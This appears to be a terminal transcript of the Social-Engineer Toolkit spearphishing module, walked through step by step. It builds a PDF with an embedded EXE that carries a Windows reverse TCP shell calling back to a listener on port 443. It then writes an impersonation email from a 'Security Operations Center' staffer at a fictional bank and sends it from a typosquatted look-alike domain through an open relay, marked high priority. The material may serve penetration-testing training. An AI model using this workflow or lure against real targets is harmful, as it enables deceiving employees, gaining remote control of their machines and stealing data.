- set> 1
- The Spearphishing module allows you to specially craft email messages and send
- them to a large (or small) number of people with attached fileformat malicious
- payloads. If you want to spoof your email address, be sure "Sendmail" is in-
- stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
- flag to SENDMAIL=ON.
- There are two options, one is getting your feet wet and letting SET do
- everything for you (option 1), the second is to create your own FileFormat
- payload and use it in your own attack. Either way, good luck and enjoy!
- 1) Perform a Mass Email Attack
- 2) Create a FileFormat Payload
- 3) Create a Social-Engineering Template
- 99) Return to Main Menu
- set:phishing>2
- Select the file format exploit you want.
- The default is the PDF embedded EXE.
- ********** PAYLOADS **********
- 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
- 2) SET Custom Written Document UNC LM SMB Capture Attack
- 3) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
- 4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
- 5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
- 6) Adobe Flash Player "Button" Remote Code Execution
- 7) Adobe CoolType SING Table "uniqueName" Overflow
- 8) Adobe Flash Player "newfunction" Invalid Pointer Use
- 9) Adobe Collab.collectEmailInfo Buffer Overflow
- 10) Adobe Collab.getIcon Buffer Overflow
- 11) Adobe JBIG2Decode Memory Corruption Exploit
- 12) Adobe PDF Embedded EXE Social Engineering
- 13) Adobe util.printf() Buffer Overflow
- 14) Custom EXE to VBA (sent via RAR) (RAR required)
- 15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
- 16) Adobe PDF Embedded EXE Social Engineering (NOJS)
- 17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
- 18) Apple QuickTime PICT PnSize Buffer Overflow
- 19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
- 20) Adobe Reader u3D Memory Corruption Vulnerability
- 21) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
- set:payloads>12
- [-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.
- 1. Use your own PDF for attack
- 2. Use built-in BLANK PDF for attack
- set:payloads>2
- 1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
- 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
- 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
- 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
- 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
- 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
- 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
- set:payloads>4
- set> IP address for the payload listener: 8.8.8.8
- set:payloads> Port to connect back on [443]:443
- [-] Generating fileformat exploit...
- [*] Payload creation complete.
- [*] All payloads get sent to the /root/.set/template.pdf directory
- [-] As an added bonus, use the file-format creator in SET to create your attachment.
- Right now the attachment will be imported with filename of 'template.whatever'
- Do you want to rename the file?
- example Enter the new filename: moo.pdf
- 1. Keep the filename, I don't care.
- 2. Rename the file, I want to be cool.
- set:phishing>2
- set:phishing> New filename:Security Bulletin
- [*] Filename changed, moving on...
- Social Engineer Toolkit Mass E-Mailer
- There are two options on the mass e-mailer, the first would
- be to send an email to one individual person. The second option
- will allow you to import a list and send it to as many people as
- you want within that list.
- What do you want to do:
- 1. E-Mail Attack Single Email Address
- 2. E-Mail Attack Mass Mailer
- 99. Return to main menu.
- set:phishing>1
- Do you want to use a predefined template or craft
- a one time email template.
- 1. Pre-Defined Template
- 2. One-Time Use Email Template
- set:phishing>2
- set:phishing> Subject of the email:New Security Bulletin
- set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
- set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Hello Mr. Public,
- Next line of the body:
- Next line of the body: This is Richard Young from the corporate office in New York.
- Next line of the body: I wanted to make sure that you received our most recent security bulletin. It covers some very crucial information about protecting your systems from network based attacks.
- Next line of the body: Please ensure that all of the employees at your Tempe, AZ branch read this as well.
- Next line of the body:
- Next line of the body: Thank you very much,
- Next line of the body: Richard Young
- Next line of the body: Security Operations Center
- Next line of the body: First Bank of Acmeland^Cset:phishing> Send email to:jpublic@firstacmeland.com
- 1. Use a gmail Account for your email attack.
- 2. Use your own server or open relay
- set:phishing>2
- set:phishing> From address (ex: moo@example.com):ryoung@firstacme1and.com
- set:phishing> The FROM NAME user will see: :Richard Young
- set:phishing> Username for open-relay [blank]:
- Password for open-relay [blank]:
- set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.firstacme1and.com
- set:phishing> Port number for the SMTP server [25]:
- set:phishing> Flag this message/s as high priority? [yes|no]:yes